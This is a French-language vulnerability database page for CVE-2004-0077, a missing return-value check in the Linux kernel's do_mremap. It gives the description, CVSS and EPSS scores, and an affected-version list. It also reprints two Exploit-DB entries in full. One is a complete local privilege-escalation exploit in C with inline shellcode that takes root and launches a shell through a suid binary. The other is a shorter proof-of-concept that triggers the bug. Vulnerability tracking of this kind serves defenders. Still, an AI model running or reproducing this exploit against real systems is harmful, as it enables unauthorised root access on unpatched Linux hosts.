CVE-2004-0077

EPSS

0.04%V3

Vecteur

Local

Publié

2004-09-01 02:00 +00:00

Dernière modif.

2011-07-16 22:00 +00:00

Liens officiels

CVE.org

NVD

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Gestion des alertes

Liste des Alertes

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Critères appliqués l'envoi de l'alerte : par rapport à la dernière alerte envoyée + différences au niveau de CISA, EPSS, CVSS, CWE, Solutions, CPE.

Paramètres

Vous pouvez sécifier un titre qui sera récupéré dans les alertes qui seront envoyées.

Spécifiez ici un CVE ID comme CVE-2024-1234

Planificiations

Mois

Prochaine exécution calculée

Jour

Jour de la semaine

Heure

Minute

Date de création

Dernière exécution

Prochaine exécution

Fonctionnalité nécessitant une connexion

Cette fonctionnalité qui vous permet de recevoir des alertes, n'est active que lorsque vous êtes connecté à votre compte.

Descriptions

The do_mremap function for the mremap system call in Linux 2.2 to 2.2.25, 2.4 to 2.4.24, and 2.6 to 2.6.2, does not properly check the return value from the do_munmap function when the maximum number of VMA descriptors is exceeded, which allows local users to gain root privileges, a different vulnerability than CAN-2003-0985.

Informations

Metrics

Metric	Score	Sévérité	CVSS Vecteur	Source
V2	7.2		AV:L/AC:L/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 160

Date de publication : 2004-02-29 23:00 +00:00
Auteur : Paul Starzetz
EDB Vérifié : Yes

/* * * mremap missing do_munmap return check kernel exploit * * gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte * ./mremap_pte [suid] [[shell]] * * Vulnerable kernel versions are all <= 2.2.25, <= 2.4.24 and <= 2.6.2 * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <unistd.h> #include <syscall.h> #include <signal.h> #include <time.h> #include <sched.h> #include <sys/mman.h> #include <sys/wait.h> #include <sys/utsname.h> #include <asm/page.h> #define str(s) #s #define xstr(s) str(s) // this is for standard kernels with 3/1 split #define STARTADDR 0x40000000 #define PGD_SIZE (PAGE_SIZE * 1024) #define VICTIM (STARTADDR + PGD_SIZE) #define MMAP_BASE (STARTADDR + 3*PGD_SIZE) #define DSIGNAL SIGCHLD #define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM) #define MREMAP_MAYMOVE ( (1UL) << 0 ) #define MREMAP_FIXED ( (1UL) << 1 ) #define __NR_sys_mremap __NR_mremap // how many ld.so pages? this is the .text section length (like cat // /proc/self/maps) in pages #define LINKERPAGES 0x14 // suid victim static char *suid="/bin/ping"; // shell to start static char *launch="/bin/bash"; _syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e); unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long new_len, unsigned long flags, unsigned long new_addr); static volatile unsigned base, *t, cnt, old_esp, prot, victim=0; static int i, pid=0; static char *env[2], *argv[2]; static ulong ret; // code to appear inside the suid image static void suid_code(void) { __asm__( " call callme \n" // setresuid(0, 0, 0), setresgid(0, 0, 0) "jumpme: xorl %ebx, %ebx \n" " xorl %ecx, %ecx \n" " xorl %edx, %edx \n" " xorl %eax, %eax \n" " mov $"xstr(__NR_setresuid)", %al \n" " int $0x80 \n" " mov $"xstr(__NR_setresgid)", %al \n" " int $0x80 \n" // execve(launch) " popl %ebx \n" " andl $0xfffff000, %ebx \n" " xorl %eax, %eax \n" " pushl %eax \n" " movl %esp, %edx \n" " pushl %ebx \n" " movl %esp, %ecx \n" " mov $"xstr(__NR_execve)", %al \n" " int $0x80 \n" // exit " xorl %eax, %eax \n" " mov $"xstr(__NR_exit)", %al \n" " int $0x80 \n" "callme: jmp jumpme \n" ); } static int suid_code_end(int v) { return v+1; } static inline void get_esp(void) { __asm__( " movl %%esp, %%eax \n" " andl $0xfffff000, %%eax \n" " movl %%eax, %0 \n" : : "m"(old_esp) ); } static inline void cloneme(void) { __asm__( " pusha \n" " movl $("xstr(CLONEFL)"), %%ebx \n" " movl %%esp, %%ecx \n" " movl $"xstr(__NR_clone)", %%eax \n" " int $0x80 \n" " movl %%eax, %0 \n" " popa \n" : : "m"(pid) ); } static inline void my_execve(void) { __asm__( " movl %1, %%ebx \n" " movl %2, %%ecx \n" " movl %3, %%edx \n" " movl $"xstr(__NR_execve)", %%eax \n" " int $0x80 \n" : "=a"(ret) : "m"(suid), "m"(argv), "m"(env) ); } static inline void pte_populate(unsigned addr) { unsigned r; char *ptr; memset((void*)addr, 0x90, PAGE_SIZE); r = ((unsigned)suid_code_end) - ((unsigned)suid_code); ptr = (void*) (addr + PAGE_SIZE); ptr -= r+1; memcpy(ptr, suid_code, r); memcpy((void*)addr, launch, strlen(launch)+1); } // hit VMA limit & populate PTEs static void exhaust(void) { // mmap PTE donor t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(MAP_FAILED==t) goto failed; // prepare shell code pages for(i=2; i<LINKERPAGES+1; i++) pte_populate(victim + PAGE_SIZE*i); i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ); if(i) goto failed; // lock unmap base = MMAP_BASE; cnt = 0; prot = PROT_READ; printf("\n"); fflush(stdout); for(;;) { t = mmap((void*)base, PAGE_SIZE, prot, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(MAP_FAILED==t) { if(ENOMEM==errno) break; else goto failed; } if( !(cnt%512) || cnt>65520 ) printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base, base+PAGE_SIZE); fflush(stdout); base += PAGE_SIZE; prot ^= PROT_EXEC; cnt++; } // move PTEs & populate page table cache ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE, MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM); if(-1==ret) goto failed; munmap((void*)MMAP_BASE, old_esp-MMAP_BASE); t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(MAP_FAILED==t) goto failed; *t = *((unsigned *)old_esp); munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE)); printf("\n[+] Success\n\n"); fflush(stdout); return; failed: printf("\n[-] Failed\n"); fflush(stdout); _exit(0); } static inline void check_kver(void) { static struct utsname un; int a=0, b=0, c=0, v=0, e=0, n; uname(&un); n=sscanf(un.release, "%d.%d.%d", &a, &b, &c); if(n!=3 || a!=2) { printf("\n[-] invalid kernel version string\n"); _exit(0); } if(b==2) { if(c<=25) v=1; } else if(b==3) { if(c<=99) v=1; } else if(b==4) { if(c>18 && c<=24) v=1, e=1; else if(c>24) v=0, e=0; else v=1, e=0; } else if(b==5 && c<=75) v=1, e=1; else if(b==6 && c<=2) v=1, e=1; printf("\n[+] kernel %s vulnerable: %s exploitable %s", un.release, v? "YES" : "NO", e? "YES" : "NO" ); fflush(stdout); if(v && e) return; _exit(0); } int main(int ac, char **av) { // prepare check_kver(); memset(env, 0, sizeof(env)); memset(argv, 0, sizeof(argv)); if(ac>1) suid=av[1]; if(ac>2) launch=av[2]; argv[0] = suid; get_esp(); // mmap & clone & execve exhaust(); cloneme(); if(!pid) { my_execve(); } else { waitpid(pid, 0, 0); } return 0; } // milw0rm.com [2004-03-01]

Exploit Database EDB-ID : 154

Date de publication : 2004-02-17 23:00 +00:00
Auteur : Christophe Devine
EDB Vérifié : Yes

/* * Proof-of-concept exploit code for do_mremap() #2 * * EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1". * EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/ * * * Copyright (C) 2004 Christophe Devine * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include <asm/unistd.h> #include <sys/mman.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED #define __NR_real_mremap __NR_mremap static inline _syscall5( void *, real_mremap, void *, old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void *, new_address ); #define VMA_SIZE 0x00003000 int main( void ) { int i, ret; void *base0; void *base1; i = 0; while( 1 ) { i++; ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ), VMA_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); if( ret == -1 ) { perror( "mmap" ); break; } base0 = base1; base1 = (void *) ret; } printf( "created ~%d VMAs\n", i ); base0 += 0x1000; base1 += 0x1000; printf( "now mremapping 0x%08X at 0x%08X\n", (int) base1, (int) base0 ); real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 ); printf( "kernel may not be vulnerable\n" ); return( 0 ); } // milw0rm.com [2004-02-18]

Products Mentioned

Configuraton 0

Redhat>>Bigmem_kernel >> Version 2.4.20-8

Redhat>>Kernel >> Version 2.4.20-8

Redhat>>Kernel_doc >> Version 2.4.20-8

Configuraton 0

Redhat>>Kernel_source >> Version 2.4.20-8

Linux>>Linux_kernel >> Version 2.2.0

Linux>>Linux_kernel >> Version 2.2.0 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.1

Linux>>Linux_kernel >> Version 2.2.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.2

Linux>>Linux_kernel >> Version 2.2.2 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.3

Linux>>Linux_kernel >> Version 2.2.3 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.4

Linux>>Linux_kernel >> Version 2.2.4 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.4 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.4 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.5

Linux>>Linux_kernel >> Version 2.2.5 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.6

Linux>>Linux_kernel >> Version 2.2.6 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.7

Linux>>Linux_kernel >> Version 2.2.7 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.8

Linux>>Linux_kernel >> Version 2.2.8 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.9

Linux>>Linux_kernel >> Version 2.2.9 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.10

Linux>>Linux_kernel >> Version 2.2.10 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.11

Linux>>Linux_kernel >> Version 2.2.11 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.12

Linux>>Linux_kernel >> Version 2.2.12 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.13

Linux>>Linux_kernel >> Version 2.2.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.13 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.14

Linux>>Linux_kernel >> Version 2.2.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.15

Linux>>Linux_kernel >> Version 2.2.15 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.15 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.15 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.15

Linux>>Linux_kernel >> Version 2.2.15 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.15_pre20

Linux>>Linux_kernel >> Version 2.2.16

Linux>>Linux_kernel >> Version 2.2.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.16 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.16

Linux>>Linux_kernel >> Version 2.2.16 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.17

Linux>>Linux_kernel >> Version 2.2.17 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.17 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.17 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.18

Linux>>Linux_kernel >> Version 2.2.18 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.19

Linux>>Linux_kernel >> Version 2.2.19 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.20

Linux>>Linux_kernel >> Version 2.2.20 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.21

Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.22

Linux>>Linux_kernel >> Version 2.2.22 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.22 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.22 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.22 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.22 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.23

Linux>>Linux_kernel >> Version 2.2.23 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.23 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.23 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.23 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.24

Linux>>Linux_kernel >> Version 2.2.24 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.24 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.24 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.24 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.24 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.24 (Open CPE detail)